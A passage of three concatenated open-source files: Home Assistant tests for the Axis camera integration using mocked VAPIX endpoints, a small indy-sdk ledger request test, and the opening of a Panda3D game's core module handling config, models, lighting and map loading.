"propertyList": {
"ProdNbr": "M1065-LW",
"ProdType": "Network Camera",
"SerialNumber": MAC,
"Version": "9.80.1",
}
},
}
LIGHT_CONTROL_RESPONSE = {
"apiVersion": "1.1",
"method": "getLightInformation",
"data": {
"items": [
{
"lightID": "led0",
"lightType": "IR",
"enabled": True,
"synchronizeDayNightMode": True,
"lightState": False,
"automaticIntensityMode": False,
"automaticAngleOfIlluminationMode": False,
"nrOfLEDs": 1,
"error": False,
"errorInfo": "",
}
]
},
}
MQTT_CLIENT_RESPONSE = {
"apiVersion": "1.0",
"context": "some context",
"method": "getClientStatus",
"data": {"status": {"state": "active", "connectionStatus": "Connected"}},
}
PORT_MANAGEMENT_RESPONSE = {
"apiVersion": "1.0",
"method": "getPorts",
"data": {
"numberOfPorts": 1,
"items": [
{
"port": "0",
"configurable": False,
"usage": "",
"name": "PIR sensor",
"direction": "input",
"state": "open",
"normalState": "open",
}
],
},
}
VMD4_RESPONSE = {
"apiVersion": "1.4",
"method": "getConfiguration",
"context": "Axis library",
"data": {
"cameras": [{"id": 1, "rotation": 0, "active": True}],
"profiles": [
{"filters": [], "camera": 1, "triggers": [], "name": "Profile 1", "uid": 1}
],
},
}
BRAND_RESPONSE = """root.Brand.Brand=AXIS
root.Brand.ProdFullName=AXIS M1065-LW Network Camera
root.Brand.ProdNbr=M1065-LW
root.Brand.ProdShortName=AXIS M1065-LW
root.Brand.ProdType=Network Camera
root.Brand.ProdVariant=
root.Brand.WebURL=http://www.axis.com
"""
IMAGE_RESPONSE = """root.Image.I0.Enabled=yes
root.Image.I0.Name=View Area 1
root.Image.I0.Source=0
root.Image.I1.Enabled=no
root.Image.I1.Name=View Area 2
root.Image.I1.Source=0
"""
PORTS_RESPONSE = """root.Input.NbrOfInputs=1
root.IOPort.I0.Configurable=no
root.IOPort.I0.Direction=input
root.IOPort.I0.Input.Name=PIR sensor
root.IOPort.I0.Input.Trig=closed
root.Output.NbrOfOutputs=0
"""
PROPERTIES_RESPONSE = f"""root.Properties.API.HTTP.Version=3
root.Properties.API.Metadata.Metadata=yes
root.Properties.API.Metadata.Version=1.0
root.Properties.EmbeddedDevelopment.Version=2.16
root.Properties.Firmware.BuildDate=Feb 15 2019 09:42
root.Properties.Firmware.BuildNumber=26
root.Properties.Firmware.Version=9.10.1
root.Properties.Image.Format=jpeg,mjpeg,h264
root.Properties.Image.NbrOfViews=2
root.Properties.Image.Resolution=1920x1080,1280x960,1280x720,1024x768,1024x576,800x600,640x480,640x360,352x240,320x240
root.Properties.Image.Rotation=0,180
root.Properties.System.SerialNumber={MAC}
"""
PTZ_RESPONSE = ""
STREAM_PROFILES_RESPONSE = """root.StreamProfile.MaxGroups=26
root.StreamProfile.S0.Description=profile_1_description
root.StreamProfile.S0.Name=profile_1
root.StreamProfile.S0.Parameters=videocodec=h264
root.StreamProfile.S1.Description=profile_2_description
root.StreamProfile.S1.Name=profile_2
root.StreamProfile.S1.Parameters=videocodec=h265
"""
VIEW_AREAS_RESPONSE = {"apiVersion": "1.0", "method": "list", "data": {"viewAreas": []}}
def mock_default_vapix_requests(respx: respx, host: str = DEFAULT_HOST) -> None:
    """Mock default Vapix requests responses."""
    base_url = f"http://{host}:80"
    # JSON POST endpoints and their canned payloads.
    json_endpoints = {
        "/axis-cgi/apidiscovery.cgi": API_DISCOVERY_RESPONSE,
        "/axis-cgi/basicdeviceinfo.cgi": BASIC_DEVICE_INFO_RESPONSE,
        "/axis-cgi/io/portmanagement.cgi": PORT_MANAGEMENT_RESPONSE,
        "/axis-cgi/lightcontrol.cgi": LIGHT_CONTROL_RESPONSE,
        "/axis-cgi/mqtt/client.cgi": MQTT_CLIENT_RESPONSE,
        "/axis-cgi/streamprofile.cgi": STREAM_PROFILES_RESPONSE,
        "/axis-cgi/viewarea/info.cgi": VIEW_AREAS_RESPONSE,
        "/local/vmd/control.cgi": VMD4_RESPONSE,
    }
    for path, payload in json_endpoints.items():
        respx.post(f"{base_url}{path}").respond(json=payload)
    # Legacy param.cgi groups, answered as plain text.
    param_groups = {
        "Brand": BRAND_RESPONSE,
        "Image": IMAGE_RESPONSE,
        "Input": PORTS_RESPONSE,
        "IOPort": PORTS_RESPONSE,
        "Output": PORTS_RESPONSE,
        "Properties": PROPERTIES_RESPONSE,
        "PTZ": PTZ_RESPONSE,
        "StreamProfile": STREAM_PROFILES_RESPONSE,
    }
    for group, payload in param_groups.items():
        respx.get(
            f"{base_url}/axis-cgi/param.cgi?action=list&group=root.{group}"
        ).respond(
            text=payload,
            headers={"Content-Type": "text/plain"},
        )
    # Applications list is XML rather than JSON or plain text.
    respx.post(f"{base_url}/axis-cgi/applications/list.cgi").respond(
        text=APPLICATIONS_LIST_RESPONSE,
        headers={"Content-Type": "text/xml"},
    )
async def setup_axis_integration(hass, config=ENTRY_CONFIG, options=ENTRY_OPTIONS):
    """Create the Axis device and return its config entry."""
    # deepcopy guards the shared module-level default dicts against
    # mutation by the integration or by individual tests.
    entry = MockConfigEntry(
        domain=AXIS_DOMAIN,
        data=deepcopy(config),
        options=deepcopy(options),
        version=3,
        unique_id=FORMATTED_MAC,
    )
    entry.add_to_hass(hass)
    with respx.mock:
        mock_default_vapix_requests(respx)
        await hass.config_entries.async_setup(entry.entry_id)
        await hass.async_block_till_done()
    return entry
async def test_device_setup(hass):
    """Successful setup."""
    with patch(
        "homeassistant.config_entries.ConfigEntries.async_forward_entry_setup",
        return_value=True,
    ) as forward_entry_setup:
        config_entry = await setup_axis_integration(hass)
        device = hass.data[AXIS_DOMAIN][config_entry.unique_id]
    # 9.10.1 comes from PROPERTIES_RESPONSE (param-cgi path); the discovery
    # response deliberately lacks basic-device-info here.
    assert device.api.vapix.firmware_version == "9.10.1"
    assert device.api.vapix.product_number == "M1065-LW"
    assert device.api.vapix.product_type == "Network Camera"
    assert device.api.vapix.serial_number == "00408C123456"
    entry = device.config_entry
    # One forwarded platform setup per supported platform, in order.
    assert len(forward_entry_setup.mock_calls) == 4
    assert forward_entry_setup.mock_calls[0][1] == (entry, "binary_sensor")
    assert forward_entry_setup.mock_calls[1][1] == (entry, "camera")
    assert forward_entry_setup.mock_calls[2][1] == (entry, "light")
    assert forward_entry_setup.mock_calls[3][1] == (entry, "switch")
    assert device.host == ENTRY_CONFIG[CONF_HOST]
    assert device.model == ENTRY_CONFIG[CONF_MODEL]
    assert device.name == ENTRY_CONFIG[CONF_NAME]
    assert device.unique_id == FORMATTED_MAC
    # The device must also be registered in the HA device registry.
    device_registry = dr.async_get(hass)
    device_entry = device_registry.async_get_device(
        identifiers={(AXIS_DOMAIN, device.unique_id)}
    )
    assert device_entry.configuration_url == device.api.config.url
async def test_device_info(hass):
    """Verify other path of device information works."""
    api_discovery = deepcopy(API_DISCOVERY_RESPONSE)
    api_discovery["data"]["apiList"].append(API_DISCOVERY_BASIC_DEVICE_INFO)
    with patch.dict(API_DISCOVERY_RESPONSE, api_discovery):
        config_entry = await setup_axis_integration(hass)
        device = hass.data[AXIS_DOMAIN][config_entry.unique_id]
    # 9.80.1 is the BASIC_DEVICE_INFO_RESPONSE value, proving the
    # basic-device-info path was used instead of param-cgi (9.10.1).
    assert device.api.vapix.firmware_version == "9.80.1"
    assert device.api.vapix.product_number == "M1065-LW"
    assert device.api.vapix.product_type == "Network Camera"
    assert device.api.vapix.serial_number == "00408C123456"
async def test_device_support_mqtt(hass, mqtt_mock):
    """Verify a device with MQTT support subscribes and creates entities from events."""
    api_discovery = deepcopy(API_DISCOVERY_RESPONSE)
    api_discovery["data"]["apiList"].append(API_DISCOVERY_MQTT)
    with patch.dict(API_DISCOVERY_RESPONSE, api_discovery):
        await setup_axis_integration(hass)
    # Integration subscribes to all of the device's MQTT topics.
    mqtt_mock.async_subscribe.assert_called_with(f"{MAC}/#", mock.ANY, 0, "utf-8")
    topic = f"{MAC}/event/tns:onvif/Device/tns:axis/Sensor/PIR/$source/sensor/0"
    message = b'{"timestamp": 1590258472044, "topic": "onvif:Device/axis:Sensor/PIR", "message": {"source": {"sensor": "0"}, "key": {}, "data": {"state": "1"}}}'
    # No binary sensors before the event; one ON PIR sensor afterwards.
    assert len(hass.states.async_entity_ids(BINARY_SENSOR_DOMAIN)) == 0
    async_fire_mqtt_message(hass, topic, message)
    await hass.async_block_till_done()
    assert len(hass.states.async_entity_ids(BINARY_SENSOR_DOMAIN)) == 1
    pir = hass.states.get(f"{BINARY_SENSOR_DOMAIN}.{NAME}_pir_0")
    assert pir.state == STATE_ON
    assert pir.name == f"{NAME} PIR 0"
async def test_update_address(hass):
    """Test update address works."""
    config_entry = await setup_axis_integration(hass)
    device = hass.data[AXIS_DOMAIN][config_entry.unique_id]
    assert device.api.config.host == "1.2.3.4"
    # A zeroconf discovery of the same MAC at a new address should update
    # the existing entry (and re-setup) rather than create a new one.
    with patch(
        "homeassistant.components.axis.async_setup_entry",
        return_value=True,
    ) as mock_setup_entry, respx.mock:
        mock_default_vapix_requests(respx, "2.3.4.5")
        await hass.config_entries.flow.async_init(
            AXIS_DOMAIN,
            data=zeroconf.ZeroconfServiceInfo(
                host="2.3.4.5",
                addresses=["2.3.4.5"],
                hostname="mock_hostname",
                name="name",
                port=80,
                properties={"macaddress": MAC},
                type="mock_type",
            ),
            context={"source": SOURCE_ZEROCONF},
        )
        await hass.async_block_till_done()
    assert device.api.config.host == "2.3.4.5"
    assert len(mock_setup_entry.mock_calls) == 1
async def test_device_unavailable(hass, mock_rtsp_event, mock_rtsp_signal_state):
    """Verify entities go unavailable when the RTSP connection drops and recover."""
    await setup_axis_integration(hass)

    # Provide an entity that can be used to verify connection state on
    mock_rtsp_event(
        topic="tns1:AudioSource/tnsaxis:TriggerLevel",
        data_type="triggered",
        data_value="10",
        source_name="channel",
        source_idx="1",
    )
    await hass.async_block_till_done()
    assert hass.states.get(f"{BINARY_SENSOR_DOMAIN}.{NAME}_sound_1").state == STATE_OFF

    # Connection to device has failed
    mock_rtsp_signal_state(connected=False)
    await hass.async_block_till_done()
    assert (
        hass.states.get(f"{BINARY_SENSOR_DOMAIN}.{NAME}_sound_1").state
        == STATE_UNAVAILABLE
    )

    # Connection to device has been restored
    mock_rtsp_signal_state(connected=True)
    await hass.async_block_till_done()
    assert hass.states.get(f"{BINARY_SENSOR_DOMAIN}.{NAME}_sound_1").state == STATE_OFF
async def test_device_reset(hass):
    """Successfully reset device."""
    config_entry = await setup_axis_integration(hass)
    device = hass.data[AXIS_DOMAIN][config_entry.unique_id]
    # async_reset reports success with an explicit True.
    assert await device.async_reset() is True
async def test_device_not_accessible(hass):
    """Failed setup schedules a retry of setup."""
    with patch.object(axis.device, "get_device", side_effect=axis.errors.CannotConnect):
        await setup_axis_integration(hass)
    # The device never lands in hass.data when the connection fails.
    assert hass.data[AXIS_DOMAIN] == {}
async def test_device_trigger_reauth_flow(hass):
    """Failed authentication trigger a reauthentication flow."""
    with patch.object(
        axis.device, "get_device", side_effect=axis.errors.AuthenticationRequired
    ), patch.object(hass.config_entries.flow, "async_init") as mock_flow_init:
        await setup_axis_integration(hass)
        # Auth failure starts a (reauth) config flow instead of retrying.
        mock_flow_init.assert_called_once()
    assert hass.data[AXIS_DOMAIN] == {}
async def test_device_unknown_error(hass):
    """Unknown errors are handled."""
    with patch.object(axis.device, "get_device", side_effect=Exception):
        await setup_axis_integration(hass)
    # Setup aborts cleanly; nothing is stored for the domain.
    assert hass.data[AXIS_DOMAIN] == {}
async def test_new_event_sends_signal(hass):
    """Make sure that new event send signal."""
    entry = Mock()
    entry.data = ENTRY_CONFIG
    axis_device = axis.device.AxisNetworkDevice(hass, entry)
    with patch.object(axis.device, "async_dispatcher_send") as mock_dispatch_send:
        axis_device.async_event_callback(action=OPERATION_INITIALIZED, event_id="event")
        await hass.async_block_till_done()
    # Exactly one dispatcher signal; each mock_calls entry is the usual
    # (name, args, kwargs) 3-tuple.
    assert len(mock_dispatch_send.mock_calls) == 1
    assert len(mock_dispatch_send.mock_calls[0]) == 3
async def test_shutdown():
    """Successful shutdown."""
    hass = Mock()
    entry = Mock()
    entry.data = ENTRY_CONFIG
    device = axis.device.AxisNetworkDevice(hass, entry)
    device.api = Mock()
    await device.shutdown(None)
    # Shutting down must stop the device's event stream exactly once.
    device.api.stream.stop.assert_called_once()
async def test_get_device_fails(hass):
    """Device unauthorized yields authentication required error."""
    with patch("axis.vapix.Vapix.request", side_effect=axislib.Unauthorized):
        with pytest.raises(axis.errors.AuthenticationRequired):
            await axis.device.get_device(
                hass, host="", port="", username="", password=""
            )
async def test_get_device_device_unavailable(hass):
    """Device unavailable yields cannot connect error."""
    with patch("axis.vapix.Vapix.request", side_effect=axislib.RequestError):
        with pytest.raises(axis.errors.CannotConnect):
            await axis.device.get_device(
                hass, host="", port="", username="", password=""
            )
async def test_get_device_unknown_error(hass):
    """Device yield unknown error."""
    # Any library error that isn't a connection problem surfaces as
    # AuthenticationRequired.
    with patch("axis.vapix.Vapix.request", side_effect=axislib.AxisException):
        with pytest.raises(axis.errors.AuthenticationRequired):
            await axis.device.get_device(
                hass, host="", port="", username="", password=""
            )
| {
"content_hash": "3e84c341c8b6e5fe69e94c198ff4013c",
"timestamp": "",
"source": "github",
"line_count": 519,
"max_line_length": 245,
"avg_line_length": 32.626204238921005,
"alnum_prop": 0.6473749483257545,
"repo_name": "rohitranjan1991/home-assistant",
"id": "cca62babbb59d66fcc6c24ea31ab844977b7146d",
"size": "16933",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "tests/components/axis/test_device.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1017265"
},
{
"name": "Python",
"bytes": "1051086"
},
{
"name": "Shell",
"bytes": "3946"
}
],
"symlink_target": ""
} |
from indy import ledger
import json
import pytest
@pytest.mark.asyncio
async def test_build_get_nym_request_works():
    """A GET_NYM request carries the submitter and a type-105 operation."""
    submitter_did = "Th7MpTaRZVRYnPiabds81Y"
    target_did = "FYmoFw55GeQH7SRFa37dkx1d2dZ3zUF8ckg7wmL7ofN4"
    request = json.loads(
        await ledger.build_get_nym_request(submitter_did, target_did)
    )
    expected = {
        "identifier": submitter_did,
        "operation": {"type": "105", "dest": target_did},
    }
    # The built request may contain extra fields; check subset only.
    assert expected.items() <= request.items()
| {
"content_hash": "7e43747819d82146f19988ec79699ae2",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 86,
"avg_line_length": 25.285714285714285,
"alnum_prop": 0.6685499058380414,
"repo_name": "korsimoro/indy-sdk",
"id": "369d55cbf2f156053c3c3edd826bf6ced3c6ce2e",
"size": "531",
"binary": false,
"copies": "1",
"ref": "refs/heads/init-node-wrapper",
"path": "wrappers/python/tests/ledger/test_build_get_nym_request.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "423067"
},
{
"name": "C#",
"bytes": "491793"
},
{
"name": "C++",
"bytes": "11939"
},
{
"name": "CSS",
"bytes": "71200"
},
{
"name": "HTML",
"bytes": "2878400"
},
{
"name": "Java",
"bytes": "411820"
},
{
"name": "Makefile",
"bytes": "143"
},
{
"name": "Objective-C",
"bytes": "838982"
},
{
"name": "Objective-C++",
"bytes": "618651"
},
{
"name": "Python",
"bytes": "302072"
},
{
"name": "Ruby",
"bytes": "4344"
},
{
"name": "Rust",
"bytes": "1554404"
},
{
"name": "Shell",
"bytes": "3854"
},
{
"name": "TypeScript",
"bytes": "163582"
}
],
"symlink_target": ""
} |
import ai
import controllers
import entities
import ui
import net
import audio
import particles
import traceback
from direct.showbase.DirectObject import DirectObject
from pandac.PandaModules import *
from direct.task import Task
from direct.filter.CommonFilters import CommonFilters
from direct.actor.Actor import Actor
from direct.directnotify.DirectNotify import DirectNotify
from direct.stdpy.file import *
import sys
import time
import math
import os
from random import uniform
clock = None # Global clock
renderLit = None # Parent nodepath for all objects that are affected by lights
renderObjects = None # Parent nodepath for dynamic objects
renderEnvironment = None # Parent nodepath for environment geometry
lights = [] # List of all light objects
lightNodes = [] # List of tuples containing lights and their nodepaths, respectively
cubeMap = None # Cubemap for all environment mapping
reflectionBuffer = None # Frame buffer for reflection effects
reflectionCamera = None # Camera to render into reflection buffer
reflectionRenderTexture = None # Texture for reflection shader to read from
filters = None # Post processing filters
# User-tunable graphics/identity settings; persisted by saveConfigFile().
enableDistortionEffects = True
enableShaders = True
enablePostProcessing = True
enableShadows = True
savedUsername = "Unnamed"
reflectionEffectsNeeded = False # True if we're in a level with water
# Window dimensions; aspectRatio is recomputed when the config is (re)loaded.
windowWidth = 800
windowHeight = 600
aspectRatio = float(windowWidth) / float(windowHeight)
isDaemon = False
cache = dict() # Model cache filled by cacheModel(), read by loadModel()
defaultFov = 70
shadowMapWidth = 1024
shadowMapHeight = 1024
mf = None # Multifile fallback when the maps directory isn't on the VFS
physicsEntityFileCache = dict() # Memo cache for readPhysicsEntityFile()
paused = False
enablePause = False
modelFileSuffix = "" # Becomes ".bam" when compiled models are present
map = None # Active Map instance (set in Map.__init__)
inputEnabled = True
maps = [] # Parsed rows of maps/maps.txt, filled by init()
def exit():
    "Tear down networking and particles, then quit the process."
    if net.context is not None:
        net.context.delete()
    particles.ParticleGroup.end()
    sys.exit()
class Logger:
    # Thin wrapper around Panda3D's DirectNotify, all under one "core" category.
    def __init__(self):
        self.notify = DirectNotify().newCategory("core")
    def error(self, msg):
        # NOTE(review): deliberately routed to warning(); presumably because
        # DirectNotify's own error() would raise — confirm before changing.
        self.notify.warning(msg)
    def warning(self, msg):
        self.notify.warning(msg)
    def info(self, msg):
        self.notify.info(msg)
    def debug(self, msg):
        self.notify.debug(msg)
    def exception(self, msg):
        # Unlike error() above, this goes to notify.error().
        self.notify.error(msg)
def togglePause():
    "Flip the global pause flag, but only when pausing is enabled."
    global paused
    if not enablePause:
        return
    paused = not paused
def loadConfigFile():
    """Load user settings from the a3p-config file in the home directory.

    A missing file or missing keys silently keep the current defaults.
    Recognized keys: enable-distortion-effects, enable-shaders,
    enable-post-processing, enable-shadows, username.
    """
    # Only the globals actually assigned need declaring; the previous
    # version also declared an undefined 'isFullscreen' global.
    global enableDistortionEffects
    global enableShaders
    global enablePostProcessing
    global enableShadows
    global savedUsername
    global aspectRatio
    try:
        configFile = open(os.path.join(os.path.expanduser("~"), "a3p-config"), "r")
    except IOError:
        # No config yet (first run); keep defaults.
        return
    try:
        lines = configFile.read().split('\n')
    finally:
        # Close the handle even if the read fails.
        configFile.close()
    for line in lines:
        parts = line.split()
        if len(parts) == 0:
            continue
        if parts[0] == "enable-distortion-effects":
            enableDistortionEffects = parts[1] == "#t"
        elif parts[0] == "enable-shaders":
            enableShaders = parts[1] == "#t"
        elif parts[0] == "enable-post-processing":
            enablePostProcessing = parts[1] == "#t"
        elif parts[0] == "enable-shadows":
            enableShadows = parts[1] == "#t"
        elif parts[0] == "username":
            # Usernames may contain spaces.
            savedUsername = " ".join(parts[1:])
    if windowHeight > 0:
        aspectRatio = float(windowWidth) / float(windowHeight)
def saveConfigFile():
    "Write the current user settings to ~/a3p-config."
    global aspectRatio
    # Keep the cached aspect ratio in sync with the stored window size.
    aspectRatio = float(windowWidth) / float(windowHeight)
    flag = lambda enabled: "#t" if enabled else "#f"
    configFile = open(os.path.join(os.path.expanduser("~"), "a3p-config"), "w")
    configFile.write("enable-distortion-effects " + flag(enableDistortionEffects) + "\n")
    configFile.write("enable-shaders " + flag(enableShaders) + "\n")
    configFile.write("enable-post-processing " + flag(enablePostProcessing) + "\n")
    configFile.write("enable-shadows " + flag(enableShadows) + "\n")
    configFile.write("username " + savedUsername)
    configFile.close()
def cacheModel(filename):
    # Preload a model and stash it in the global cache for loadModel to instance.
    global modelFileSuffix
    model = loader.loadModel(filename + modelFileSuffix)
    # NOTE(review): reparenting to renderLit and then immediately to hidden
    # looks like it forces initial render/shader state before hiding — confirm.
    model.reparentTo(renderLit)
    model.reparentTo(hidden)
    cache[filename] = model
def loadModel(filename):
    "Return a node for the model, instancing from the preload cache when possible."
    global modelFileSuffix
    cached = cache.get(filename)
    if cached is None:
        # Not preloaded; load a fresh copy from disk.
        return loader.loadModel(filename + modelFileSuffix)
    node = hidden.attachNewNode(filename)
    cached.instanceTo(node)
    return node
def loadAnimation(filename, animations):
    """Load an Actor with the given animation dict, honoring modelFileSuffix.

    The previous version appended the suffix to the caller's dict in
    place, so passing the same dict twice produced doubled suffixes;
    a suffixed copy is built instead.
    """
    global modelFileSuffix
    suffixed = dict(
        (name, path + modelFileSuffix) for name, path in animations.items()
    )
    a = Actor(filename + modelFileSuffix, suffixed)
    a.setBlend(frameBlend = True)
    return a
def deleteModel(node, filename):
    # filename is unused but kept for interface symmetry with loadModel;
    # cached master models stay loaded for future instancing.
    node.removeNode()
def init(showFrameRate = False, daemon = False):
    "Initializes various global components, like audio, lighting, and the clock. Should be called once at the beginning of the program."
    # NOTE(review): showFrameRate is currently unused in this body.
    global renderLit
    global clock
    global renderObjects
    global renderEnvironment
    global log
    global reflectionBuffer
    global reflectionCamera
    global reflectionRenderTexture
    global defaultFov
    global enableShaders
    global enablePostProcessing
    global enableDistortionEffects
    global filters
    global isDaemon
    global mf
    global maps
    # When running from a packaged build the maps directory is inside a
    # multifile; open it as a fallback for readFile().
    mf = None
    if not vfs.isDirectory("maps"):
        mf = Multifile()
        mf.openRead(ExecutionEnvironment.getEnvironmentVariable("PKG_ROOT") + "/pkg.mf")
    isDaemon = daemon
    if not daemon:
        base.setBackgroundColor(2.0/255.0, 28.0/255.0, 53.0/255.0)
    log = Logger()
    sys.excepthook = exceptHook
    clock = Clock()
    base.disableMouse() # Disable default mouse camera control
    if not daemon:
        base.camNode.setCameraMask(BitMask32.bit(1))
        base.camLens.setFov(defaultFov)
    # Scene graph roots: everything lit lives under renderLit.
    renderLit = render.attachNewNode("renderLit")
    renderObjects = renderLit.attachNewNode("renderObjects")
    renderEnvironment = renderLit.attachNewNode("renderEnvironment")
    controllers.init()
    ai.init()
    audio.init(dropOffFactor = 1.4, distanceFactor = 14, dopplerFactor = 0.0)
    # Pre-create a fixed pool of (initially black) dynamic point lights;
    # only when shaders are on and we're not a headless daemon.
    numMaxDynamicLights = 0
    if enableShaders and not daemon:
        numMaxDynamicLights = 2
    for i in range(numMaxDynamicLights):
        light = PointLight("Light" + str(i))
        light.setColor(Vec4(0, 0, 0, 1))
        light.setAttenuation(Vec3(0, 0, 1))
        lightNode = renderLit.attachNewNode(light)
        lightNode.setPos(0, 0, 0)
        renderLit.setLight(lightNode)
        lightNodes.append((light, lightNode))
    if enableShaders and not daemon:
        shadersChanged()
    if enablePostProcessing and not daemon:
        postProcessingChanged()
    if not daemon:
        # Offscreen buffer + camera used for reflection/distortion effects;
        # the camera starts inactive and is toggled by distortionEffectsChanged().
        winprops = WindowProperties()
        props = FrameBufferProperties()
        props.setRgbColor(1)
        reflectionBuffer = base.graphicsEngine.makeOutput(
            base.pipe, "reflection-buffer", -2,
            props, winprops,
            GraphicsPipe.BFSizeTrackHost | GraphicsPipe.BFRefuseWindow,
            base.win.getGsg(), base.win)
        reflectionBuffer.setSort(-100)
        reflectionBuffer.setClearColor(Vec4(0, 0, 0, 0))
        reflectionRenderTexture = Texture()
        reflectionBuffer.addRenderTexture(reflectionRenderTexture, GraphicsOutput.RTMBindOrCopy, GraphicsOutput.RTPColor)
        reflectionCamera = base.makeCamera(reflectionBuffer, scene = render, lens = base.cam.node().getLens(), mask = BitMask32.bit(4))
        reflectionCamera.reparentTo(render)
        reflectionCamera.node().setActive(False)
    particles.init()
    # Tab-separated rows describing the available maps.
    maps = [x.split("\t") for x in readFile("maps/maps.txt").split("\n")]
def preloadModels():
    "Preload all commonly used models into the instancing cache."
    global modelFileSuffix
    # Prefer compiled .bam models when a compiled build is present.
    if os.path.exists("models/basicdroid/BasicDroid.bam"):
        modelFileSuffix = ".bam"
    modelNames = [
        "models/basicdroid/BasicDroid",
        "models/basicdroid/chaingun",
        "models/basicdroid/BasicDroid-lowres",
        "models/basicdroid/sniper",
        "models/basicdroid/shotgun",
        "models/basicdroid/pistol",
        "models/shield/shield",
        "models/grenade/Grenade",
        "models/fragment/Fragment",
        "models/basicdroid/claw",
        "models/basicdroid/claw-Retract",
        "models/basicdroid/claw-Impale",
        "models/fragment/GlassFragment",
        "models/spawnpoint/SpawnPoint",
        "models/spike/spike",
        "models/pod/pod",
        "maps/Block",
        "maps/block1",
        "models/crosshair/crosshair",
    ]
    for name in modelNames:
        cacheModel(name)
def postProcessingChanged():
    "Apply the current post-processing setting (HDR + bloom) and persist it."
    global filters
    if enablePostProcessing:
        # Lazily create the filter chain the first time it's enabled.
        if filters is None:
            filters = CommonFilters(base.win, base.cam)
        render.setAttrib(LightRampAttrib.makeHdr1())
        filters.setBloom(intensity = 1, size = 2)
    elif filters is not None:
        filters.delBloom()
    saveConfigFile()
def shadersChanged():
    # Toggle Panda's auto-shader generation on the lit scene graph, then
    # persist the setting.
    if enableShaders:
        renderLit.setShaderAuto()
    else:
        renderLit.clearShader()
    saveConfigFile()
def shadowsChanged():
    "Apply the current shadow setting to the active map and persist it."
    global map
    if map is not None:
        toggle = map.enableShadows if enableShadows else map.disableShadows
        toggle()
    saveConfigFile()
def distortionEffectsChanged():
    # The reflection camera only needs to run when distortion is enabled AND
    # the current level actually uses reflections (e.g. has water).
    if reflectionCamera != None:
        reflectionCamera.node().setActive(enableDistortionEffects and reflectionEffectsNeeded)
    saveConfigFile()
def exceptHook(type, value, trace):
    # Custom sys.excepthook: log the traceback instead of crashing silently.
    # HACK: patch sys.exc_info so the logging machinery sees this exception.
    sys.exc_info = lambda: (type, value, trace) # logging uses sys.exc_info to get exception data.
    exceptionData = traceback.format_exc()
    log.info(exceptionData)
    print exceptionData
def clearLights():
    "Remove every registered light and empty the global list."
    global lights
    for light in lights:
        light.remove()
    lights[:] = []
def update():
    "Updates global components. Basically the clock. Should be called once every frame, regardless of the game state."
    if not paused:
        clock.update()
    else:
        # Freeze simulation time while paused so nothing advances.
        clock.timeStep = 0
    particles.ParticleGroup.begin()
    particles.update(not paused)
def endUpdate():
    # Flush per-frame particle batching; pairs with ParticleGroup.begin() in update().
    particles.ParticleGroup.end()
class Clock:
    """Global clock; used just about everywhere.
    Starts at 0, units are in seconds.
    You can also change how fast it increments (slow down or speed up time).
    A new clock should be initialized every time a new Game is created."""
    def __init__(self):
        # time.clock on Windows, time.time elsewhere.
        self.timerFunction = time.clock if sys.platform == "win32" else time.time
        self._time = self.timerFunction()
        self.timeStep = 0
        self.lastFrameTime = self.time
    def update(self):
        "Call once every frame."
        now = self.timerFunction()
        self.lastFrameTime = self.time
        self._time = now
        # Clamp the step to [5ms, 100ms] so stalls and hyper-fast frames
        # don't destabilize the simulation.
        self.timeStep = min(0.1, max(0.005, now - self.lastFrameTime))
    @property
    def time(self):
        return self._time
def readFile(file):
    "Read a file from the virtual file system, falling back to the multifile."
    if vfs.exists(file):
        return vfs.readFile(file, 1)
    if mf is not None:
        # We're reading from a packaged multifile build.
        return mf.readSubfile(mf.findSubfile(file))
    return ""
def readPhysicsEntityFile(file):
    "Read a physics entity definition from maps/, memoized in a global cache."
    global physicsEntityFileCache
    try:
        return physicsEntityFileCache[file]
    except KeyError:
        data = readFile("maps/" + file)
        physicsEntityFileCache[file] = data
        return data
class Map(DirectObject):
"""A Map loads all environment resources from a map file.
Maps also keep track of the custom lights, skybox textures, sounds, etc, and can save this data back to a map file."""
    def __init__(self):
        global map
        # Register this instance as the single active map.
        map = self
        self.skyBox = None
        self.skyBoxFilename = ""
        self.sceneries = dict()
        # Static geometry tracked by scene-graph node.
        self.staticGeometries = dict()
        self.worldSize = 0
        self.lights = []
        # Water rendering state (node, clip plane, and its scene-graph nodes).
        self.waterNode = None
        self.waterPlane = None
        self.waterPlaneNode = None
        self.waterPlaneNodePath = None
        self.mapDirectory = "maps"
        self.isSurvival = False
        self.ambientSound = None
        self.platforms = []
        self.name = ""
def addSoundGroup(self, soundGroup):
self.soundGroups[soundGroup.name] = soundGroup;
def addStaticGeometry(self, geom):
if not geom.node in self.staticGeometries:
self.staticGeometries[geom.node] = geom
def deleteStaticGeometry(self, geom):
geom.node.removeNode()
geom.geometry.destroy()
if geom.node in self.staticGeometries:
del self.staticGeometries[geom.node]
    def showPlatforms(self):
        # Make all platform nodes visible.
        for p in self.platforms:
            p.show()
    def hidePlatforms(self):
        # Hide all platform nodes.
        for p in self.platforms:
            p.hide()
    def disableShadows(self):
        # Turn off shadow casting on every spotlight that is currently casting.
        for light in self.lights:
            if isinstance(light.getNode(0), Spotlight) and light.node().isShadowCaster():
                light.node().setShadowCaster(False)
    def enableShadows(self):
        # Re-enable casting for lights tagged "shadow". NOTE(review): this keys
        # off the tag while disableShadows keys off Spotlight type — confirm
        # the asymmetry is intentional.
        for light in self.lights:
            if light.getTag("shadow") == "true":
                light.node().setShadowCaster(True, shadowMapWidth, shadowMapHeight)
def load(self, name, aiWorld, entityGroup):
"Loads the specified map file, creating all resources, and filling out the AI world and entity group."
global cubeMap
global reflectionEffectsNeeded
self.name = name
self.filename = "maps/" + self.name + ".txt"
mapDirectory = "maps"
data = readFile(self.filename)
lines = data.split('\n')
for line in lines:
tokens = line.split()
if len(tokens) == 0 or line[0] == "#":
continue
if tokens[0] == "world":
self.worldSize = float(tokens[1])
elif tokens[0] == "teams":
numTeams = sum([int(token) for token in tokens[1:]])
if net.netMode == net.MODE_SERVER:
if len(tokens) > 2: # 2v2
colors = [Vec4(0.7, 0.0, 0.0, 1), Vec4(0.0, 0.0, 0.7, 1), Vec4(0.2, 0.0, 0.0, 1), Vec4(0.0, 0.0, 0.2, 1)]
else: # Free-for-all up to 4 players
